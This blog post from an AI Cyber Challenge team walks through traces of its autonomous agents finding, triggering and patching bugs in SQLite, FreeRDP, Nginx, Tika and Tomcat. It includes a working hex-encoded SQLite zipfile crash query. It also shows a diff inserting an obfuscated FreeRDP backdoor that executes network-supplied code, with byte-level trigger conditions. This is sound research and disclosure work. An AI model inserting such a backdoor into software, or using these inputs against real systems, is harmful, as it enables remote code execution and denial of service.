Inside the brain of a hacking robot: Exploring traces | AI Cyber Challenge

Agent trajectory walkthroughs of a fully autonomous hacking system

Aug 08, 2025

Inside the brain of a hacking robot: Exploring traces | AI Cyber Challenge

Contents

Introduction SQLite FreeRDP Nginx Apache Tika Apache Tomcat Conclusion

Introduction

Building LLM Agents to solve complex security tasks unfortunately is still a complicated task with a lot of human effort involved. Fortunately, LLM Agents provide wonderful vantage points to introspect their work compared to other techniques like fuzzing or formal methods. To gain insights to the strengths and limitations of LLMs, we can simply read through the agent log trajectories! In this blog we will go through a few logs that we’ve selected (the total logs for all our testing runs are over a hundred gigabytes, and some contain bugs not yet patched by vendors) and point out some interesting features.

Keep in mind that in all of these cases, the only input our CRS had was the code repository (without commit history), and no human intervention to select, triage, or prioritize bugs. Further, POVs crafted here are all done without human input, and without input from fuzzers.

SQLite

The first traces we will examine are from examining SQLite. SQLite is a lightweight database engine written in C that is around 330k lines of code in development since 2000. SQLite is incredibly popular and used by a huge body of other software: operating systems such as Windows, Mac OS, and several flavors of Linux, all major web browsers, cars, planes, and of course most importantly, in our CRS itself!

During an AIxCC practice round, we were given a version of SQLite with a harness that allowed running arbitrary SQL queries. There were some injected bugs by the organizers that we identified, but what was more interesting for us were the bugs the organizers did NOT inject. Our LLM agents actually found lots of unintended ways to crash this, though most of them were not security critical. However, at least two of them were! These have been fixed on August 5th by SQLite.

Out-of-bounds Write

This bug is a basic heap buffer-overflow inside of the zipfile extension in SQLite, which is enabled by default. This is a pretty interesting case because this sort of bug would be incredibly difficult to find through fuzzing without knowing to target this specific pattern.

This is one of the few traces where we include the VulnAnalyzer agent. This agent runs early on in the pipeline to take a low-confidence bug report, verify it, and then enrich it with more detailed information to help downstream processes. In this case we can see it is crucial—with the enriched bug report, triggering this buffer overflow is actually easy!

As with all our POV attempts, we run 3 agents in parallel on the task to minimize latency (as it is a factor in scoring for the game). For this trace we included all of them, though we see two are quickly terminated as the last one succeeds. Unfortunately the successful log itself is a bit unsatisfying: the output is too large to display as a tool message as it uses 64k ‘A’ characters as part of its overflow. The actual stack trace logged from our system (inside our own SQLite database!) was

==43==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x53100004c878 at pc 0x55675809c407 bp 0x7ffe3401f750 sp 0x7ffe3401f748
WRITE of size 1 at 0x53100004c878 thread T0
SCARINESS: 31 (1-byte-write-heap-buffer-overflow)
Stack Frame #0 in zipfilePutU16 shell.c
Stack Frame #1 in zipfileSerializeLFH shell.c
Stack Frame #2 in zipfileAppendEntry shell.c
Stack Frame #3 in zipfileUpdate shell.c
Stack Frame #4 in sqlite3VdbeExec sqlite3.c
Stack Frame #5 in sqlite3Step sqlite3.c
Stack Frame #6 in sqlite3_step (/out/customfuzz3+0x391914)
Stack Frame #7 in exec_prepared_stmt shell.c
Stack Frame #8 in shell_exec shell.c
Stack Frame #9 in shell_main (/out/customfuzz3+0x8ba51f)
Stack Frame #10 in LLVMFuzzerTestOneInput (/out/customfuzz3+0x372b2b)
Stack Frame #11 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:614:13
Stack Frame #12 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:327:6
Stack Frame #13 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:862:9
Stack Frame #14 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10
Stack Frame #15 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16
Stack Frame #16 in _start (/out/customfuzz3+0x20a93d)

DEDUP_TOKEN: zipfilePutU16--zipfileSerializeLFH--zipfileAppendEntry--zipfileUpdate--sqlite3VdbeExec
0x53100004c878 is located 0 bytes after 65656-byte region [0x53100003c800,0x53100004c878)
allocated by thread T0 here:
Stack Frame #0 in malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:68:3
Stack Frame #1 in sqlite3MemMalloc sqlite3.c
Stack Frame #2 in mallocWithAlarm sqlite3.c
Stack Frame #3 in sqlite3Malloc sqlite3.c
Stack Frame #4 in sqlite3_malloc64 (/out/customfuzz3+0x37959a)
Stack Frame #5 in zipfileConnect shell.c
Stack Frame #6 in vtabCallConstructor sqlite3.c
Stack Frame #7 in sqlite3VtabCallCreate sqlite3.c
Stack Frame #8 in sqlite3VdbeExec sqlite3.c
Stack Frame #9 in sqlite3Step sqlite3.c
Stack Frame #10 in sqlite3_step (/out/customfuzz3+0x391914)
Stack Frame #11 in exec_prepared_stmt shell.c
Stack Frame #12 in shell_exec shell.c
Stack Frame #13 in shell_main (/out/customfuzz3+0x8ba51f)
Stack Frame #14 in LLVMFuzzerTestOneInput (/out/customfuzz3+0x372b2b)
Stack Frame #15 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:614:13
Stack Frame #16 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:327:6
Stack Frame #17 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:862:9
Stack Frame #18 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10
Stack Frame #19 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16

DEDUP_TOKEN: __interceptor_malloc--sqlite3MemMalloc--mallocWithAlarm--sqlite3Malloc--sqlite3_malloc64
SUMMARY: AddressSanitizer: heap-buffer-overflow shell.c in zipfilePutU16
Shadow bytes around the buggy address:
  0x53100004c580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x53100004c800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
  0x53100004c880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004c900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004c980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004ca00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004ca80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==43==ABORTING

We can also see how our system attempt to patch this. The first attempt was performed before we had produced a POV, as our system was confident this was a real vulnerability and once again we seek to minimize latency to increase our score in the competition. However, we see that after the POV was created, the system realized the patch was not complete, and tried again, this time with the aid of a testcase against which to test.

Out-of-bounds Read

Another overflow was identified by our system in the same area of code, but a different bug path. This time the bug involves loading and reading a corrupted zip file. Once again, this is the type of bug that would be quite difficult to fuzz! it involves not only a crafted SQL query, but also a properly formatted and specially crafted zip file which is hex encoded.

This time the VulnAnalyzer agent does a pretty good job describing the bug, but the POV producer (once again one of three racing) needed to a bit more work this time to understand how to load a virtual zipfile inside of SQLite, and how exactly the zipfile must be crafted. In the end the SQL query it produces is

SELECT * FROM zipfile(X'504b03041400000000000000000000000000100000001000000001000100414243434343504b010214001400000000000000000000000000ffff0000ffff000001000000000000000000000000000000000041504b050600000000010001002f000000240000000000');

This time the patching that launched in parallel before the POV was complete did not need to be restarted.

FreeRDP

Next, let’s look at FreeRDP. If you aren’t familiar with it, their website describes FreeRDP as “a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license”. It is a C codebase of around 500k lines that has been under active development since 2011. It provides both capabilities as an RDP client and an RDP server, and is used by other RDP tools such as Remmina which ships with Ubuntu.

Synthetic Backdoor

During an AIxCC practice round, we were given a sample of FreeRDP with some bugs inserted. One of them is an obfuscated backdoor.

In some debug notes not available to our system, the authors of this challenge problem wrote:

This vulnerability is backdoor, hidden within an obfuscated & hidden application tag message, when triggered allows an arbitrary memory write; this is intented to be hard for an CRS to understand what is happening within it. This vulnerability should be difficult to build an affective payload to demonstrate the vulnerability, but relatively easy to patch.

The actual code for the bug is something like

diff a/libfreerdp/core/mcs.c b/libfreerdp/core/mcs.c
--- a/libfreerdp/core/mcs.c
+++ b/libfreerdp/core/mcs.c
@@ -911,16 +911,6 @@ BOOL mcs_recv_connect_response(rdpMcs* mcs, wStream* s)
 	if (!tpdu_read_data(s, &li, tlength))
 		return FALSE;
 
+	if (ber_read_application_tag(s, 0x42, &length))
+	{
+		#define A size_t 
+		#define B void 
+		A/*AOB,1rI<o2iKHfFJ*/a/*vnM 8Iv"b^Z[=&&9[12(bW*/=/*q!fYBcH$U?1JH0[qX@DlBtA*/0/*e+Co)nj?,*/;/*zjY9_9fJH)_ C}'dYLw|iX :o=*/A/*q?P@uK?Nu$e.%"Br*/f/*Q^4$n*/=/*x?UdG8b($5Id>7M4TgyIgC"Yfp=wv4^uS*/1<<0xc/*F.z}JtF#I_pZlT*/;/*n@KQd$n$E(YKr@ <-jYA#bKZ*/B*/*GW:mGM(*/b/*gERD0u4BU'O_)3*/;/*lk+gFuS7i6{A9Iv"]*//*ceq0i q1;rNs<tOCSUT*/if (posix_memalign/*uK3WW_YvZN{a10*/(&b,/*p7H|>r6v(^CK:xjf$][<};(Cn*/1<<0x9,/*F8W0gnG7hxQp?}4boF8N:438QgC*/f)/*N&N%HGu<,5vS N5OV^XF*/){return(0);};/*Bz{dVPE5A6eJpUMaX8Nl]GxT(rU*/A*/*LnztTqEE[)C*/c/*r^J;HOHG>SwY=H#s[HDz]N,ju{w|B*/=/*rx![HTZwE::sA&*/(A*)b/*Ki%P|3*/;/*zllh;'vu#og_pS;19Jlyp{|YYu*//*MwOX]g2hS(@knC7*/if(mprotect/*A$zFedaEmFJ$*/((B*)(((A)c)&(~0xfff)),/*d4E}Im'gWCsj%)-U3o[vq%a=X!*/f,/*n$wds'3jhIeAxs%)q$KGlA([Gb*/7)/*mKgBwh{u):O3WUcLH^uGHtq*/){return(0);};/*b]c+RpPVn$Px^;!r]M*/A/*wdSQd CLS1.>R^Q9LKVh:!*/d/*P8+2&YDiaJ?Zg]DBesXG(c0L"a*/;/*DI;(]E*/for/*O2#N21utWq,3 Y:JNj92>x*/(a=0;/*faU;Y$xK.[4|p;N*/a/*S?p1$Ef|x:2K_)3x-xbI;k*/</*V3K!Hf1|Wr1Ts=x"2,*/length/8;/*Y1bBgb-f#kB<HSG*/a++)/*Jznf%x1UV?o$a{;ZuBi?R+O*/{/*uo@lho{Vr9wo3)B%cK7I1o}.*/Stream_Read_UINT64_BE(s,/*htxpI4o#)WdBr^706Q,MI<i{g-pPo}*/d)/*Ne9@w-TzlEB'(fQydF*/;/*xL;Z}xffT)VD8iLPj(d4U!u*/c[a]/*dRtrW<,:*/=/*EiNHdr>d*/d/*ATgOpsR*/;/*P.{mJUU>*/}/*jB|Vm!}.UyNk9OVo]52$T4hvc5!Is*/B/*P^;9ni,z0IXa3#Qy*/(*e)()/*SG)+{5_Ql2{XUx]'D)1gdhO@*/=/*d5x<n[gd$(*/(B(*)())b/*N]k}F%B|c)6QNBnt{MBSaH5wwGCnq{p*/;e()/*sR'.ixaZj.0-<w,XWNw1bZ9 */;
+		return TRUE ;
+	} else {
+		Stream_Rewind(s, 2);
+	}
+
 	if (!ber_read_application_tag(s, MCS_TYPE_CONNECT_RESPONSE, &length) ||
 	    !ber_read_enumerated(s, &result, MCS_Result_enum_length) ||
 	    !ber_read_integer(s, &calledConnectId) ||

The good news is that even if this is a bit inscrutable, LLM based bug detection on the code base easily flags this as a potential bug to investigate! After reading this code, our LLM system produces a bug report like:

name: Backdoor
reason: The function contains obfuscated code that allocates an executable memory region, copies data from the network stream into it, and then executes it. This is a backdoor allowing remote code execution on the client by a malicious server.
source: if (ber_read_application_tag(s, 0x42, &length))

Of course, our system produces lots of bug reports, so before we go further with that, we pass it through filtering steps to weed out false positives. Our first step is the VulnClassifier, which quickly and very cheaply (just $0.004!) judges this as a plausible report, giving it the maximum score of 100% for being a likely bug. That bug, along with other high-scoring reports, are sent off to our VulnAnalyzer agent which has access to source browsing tools to attempt to understand the code better.

This is a fairly straightforward process that most human security researchers would perform. The LLM agent based on OpenAI’s o4-mini model looks at the surrounding code, and traces the path to the vulnerable code up to the test harness in TestFuzzCoreClient.c. You can view the whole trace here. The first takeaway is that this agent is relatively inexpensive. It took about $0.80 to look at the vulnerability, decide if it was a valid report or a false positive, and also provide us a lot more detail about the specifics. In the end its more detailed description was:

  <function>mcs_recv_connect_response</function>
  <file>FreeRDP/libfreerdp/core/mcs.c</file>
  <description>
    A hidden branch activated by BER application tag 0x42 that allocates an RWX memory buffer,
    copies attacker‐supplied bytes into it, and jumps to it, enabling immediate crashes or
    remote code execution.
  </description>
  <conditions>
    Input must be fed to freerdp_is_valid_mcs_create_response (e.g. TestFuzzCoreClient):
    1) TPKT header: [0x03,0x00,lenH,lenL] with total len>=7.
    2) X.224 Data TPDU: [LI,0xF0,0x80].
    3) BER extended application tag: [0x7F,0x42].
    4) BER length (e.g. 0x08 for an 8-byte payload, or >0x1000 to overflow).
    5) At least that many payload bytes follow.
    This causes mcs_recv_connect_response to take the backdoor path, copy and mprotect the
    payload as code, and execute it, crashing under ASAN/UBSAN.
  </conditions>

Already this is a much more actionable and useful report for a human. But of course, we don’t get humans in AIxCC! So we instead pass this report off to yet another LLM agent. In this case, we want to try to write an input to trigger this bug, so we launch a PovProducer, whose trace you can find here. (Actually our system launches 3 PovProducer agents in parallel, but the other two are terminated once the first one succeeds) Overall the CRS is able to handle this backdoor quite easily! There is a bit of trickiness around the BER extended application tag, but once that is settled, the target crashes.

Unfortunately, we get a very unsatisfying “Tool call output was too large to return. Please try another approach.” message when the target crashes. The FreeRDP test harness outputs about 60kB of data when executing this input, which our backend code refuses to send to the agent for fear of polluting the context window. Luckily, that same backend code detects the crash occurred, logs the input, and halts the agent.

Unintended Integer Overflow

While it is nice to see that our system can find and trigger intended, synthetic bugs, the goal is to find real software vulnerabilities. Fortunately, this challenge provided us with a great example. In addition to the synthetic vulnerabilities, our system spotted other bugs in the FreeRDP code. After some investigation, we realized one of these is a bug that was fixed upstream after the AIxCC test project was forked (and after the knowledge cutoff for our model). Luckily this also means we don’t need to wait for disclosures before we can talk about it!

This bug is a signed integer overflow in the RDP T.124 Generic Conference Control handling when reading client monitor information. Notably we never surfaced this vulnerability in our fuzzing using libfuzzer on many cores for many hours across many test runs, even starting with a corpus of seeds from upstream oss-fuzz. In fact, the only time we observed any code in the Generic Conference Control handling being exercised was when an LLM crafted inputs to it.

Upon review of some of our test runs, we found that our system has actually spotted this bug multiple times (though rarely successfully triggered it). In this case, the bug report sent to our system was surfaced from static analysis using infer, and was a bit minimal:

Vulnerability in gcc_read_client_monitor_data in FreeRDP/libfreerdp/core/gcc.c:
Vulnerability site: gcc_read_client_monitor_data on line 2150
Vulnerability type: Integer Overflow
Qualifier: ([-inf, +inf] - [-inf, +inf]):signed32

This is a much more interesting and challenging example than the intended vulnerability. We see that the system starts off very methodically following a normal set of steps:

Get more details about the nature of the bug (by spawning a SourceQuestions sub-agent)
Figure out which of the several harnesses can actually reach the code in question (by again spawning a SourceQuestions sub-agent)
Ask for an input-encoder for the relevant harness (though it turns out to be quite bare-bones)
Develop and debug the input

The last step is, understandably, where most of the effort is spent. Interestingly, the agent doesn’t jump into attempting a POV immediately. First it “realizes” this is going to be a difficult task, saying “Given the complexity of manually crafting the full MCS Connect-Initial PDU, let me try a different approach. Let me check if there are any simpler ways to reach this function or if there are existing malformed test cases I can modify” and requests examples or test cases (which unfortunately fails).

Next, rather than attempt to trigger integer overflows, it instead just tries tests saying: “Let me try to create a minimal test to see what happens”. Definitely behavior to which humans can relate!

Looking at these logs we also see some issues with our sub-agents. Specifically, several calls to the SourceQuestions sub-agent error out with “no response was produced”, which means the sub-agent did not terminate in the allowed number of turns. Some prompting to address this was added in later versions of our system, but the LLM is still able to work around those deficiencies here–usually rephrasing its question to be simpler or more specific.

This is one of the amazing–and frustrating–things with agents: they may succeed even if there are bugs the LLM needs to overcome. This makes them a great tool for ambiguous or complicated tasks, but it also makes evaluations more difficult as success alone is not a sufficient indicator of overall health.

Still, reading through this agent trace we see that overall the system is doing a great job cooperating among the agents. As the main PovProducer is building up its input, it asks some fairly vague questions to the DynamicDebug agent, such as

Does this input reach the gcc_read_client_monitor_data function? What errors or issues occur during parsing?

Fortunately, the response is very helpful, not only answering the question, but also providing a recommendation of how to fix the parsing issues:

The PoV does not reach gcc_read_client_monitor_data because it fails early in the parsing process, specifically at the object identifier check in gcc_read_conference_create_request. The function fails when trying to read the T.124 object identifier (t124_02_98_oid).

The issue is in the input construction: The GCC Conference Create Request requires a specific T.124 object identifier (0.0.20.124.0.1) to be present in the data, but looking at the data being processed (0x05, 0x00, 0x14, 0x7c, 0x01, 0x00...), this identifier is not properly encoded in the input. Instead, the input jumps directly to the GCC header data.

To fix this, the input needs to be modified to include the proper BER/PER encoding of the T.124 object identifier before the GCC header data. The current gcc_header value in the Python code should be preceded by the properly encoded object identifier.

This shows a fairly deep understanding of the code pathways in question. While the CRS was not given the ability to search for help on the internet due to competition rules, large models fortunately have enough background information to be able to answer questions about standard protocols by themselves.

Despite the complexity of the bug and the issues with the SourceQuestions sub-agent, after about $4.25 of LLM spend and 40 minutes, the agent successfully produces a POV for this bug. Very impressive for a non-trivial bug report, and very cool to see an example of an unknown bug being found and triggered without human intervention!

Nginx

Nginx is a popular webserver used by millions of websites around the world. It is a C codebase of around 250k lines, and has been under active development since it was first released in 2004. For our analysis, we used a version of the code derived from the release by the AIxCC organizers. This release has several intended vulnerabilities.

Although the traces for POVs are available for Nginx here, let’s move on to patching since we haven’t covered that yet.

Patches in our system are based on a diff-like format. This is a format that is widely used and thus present in lots of training data, but LLMs still struggle due to specifics of the diff format like line numbers. While in most cases we can use fuzzy matching to transparently handle any issues, sometimes that fails. For example, in this trace we can see the LLM repeatedly fail to apply a patch due to the fuzzy match failing as there is some repeated code that causes matches to be ambiguous. After reading through the surrounding code to get more context, the model tries a more complicated patch which again fails. Finally, four separate patches are made to different code regions, which eventually succeed.

Overall, the traces are probably familiar to folks who are familiar with other agentic coding systems that are now very popular.

Apache Tika

Tika is a tool for extracting metadata and text from a huge number of different file types (images, documents, archives, and so on). Unlike the others here, it is a Java project, and about 215k lines of code.

For this, we have included every Tika related POV trace from a test run. These are partitioned across 8 files to make it easier to browse. The first thing to note is that this is a lot. The other projects had similar numbers of attempts and total spend (hundreds of dollars) before being curated down. These logs include not just parallel attempts that were terminated due to successes, but also attempts that may be impossible due to build configs (if we believe the LLM’s assessment), or attempts on false-positive bug reports.

One particularly cool example is this. A report is given which tasks the POV producer with producing a zip file to trigger a runtime path traversal bug. First, we see that the POV producer can simply use native Python libraries for crafting zip files–much more efficient than fuzzing or crafting them byte-by-byte! Unfortunately, the agent encounters an issue: the zip file handling safely works around the path traversal. Undeterred, the agent keeps investigating and notices that it can instead trigger the bug by using specially crafted tar files! After the repeated failures against zip files the agent targets a completely different harness and crafts a tarfile input using Python’s tarfile library that works the first time! Although this isn’t necessarily a security relevant bug, this would be scoreable in AIxCC if the runtime security checks fire.

Apache Tomcat

Tomcat is a Java web application server, created in 1999 and still heavily used. It consists of around 420k lines of Java code. This example is one that we created internally and injected some of our own bugs into.

Here we once again include all the POV producers. One fun thing here is a backdoor that we injected which is only triggered if a SHA-256 sum of some data has a certain prefix. This would be very difficult with fuzzing, but with our agents it is solvable!

Conclusion

This was just a quick summary of a few interesting pieces of some of the agent traces from our system. During development, we found reading through these logs to be incredibly useful for adjusting prompts, tools, and work boundaries between different parts of our system. Our team still has not been able to look through every trace for every agent. We encourage you to explore the traces for yourself and see what insights you can take away! If you notice anything particularly interesting, please let us know!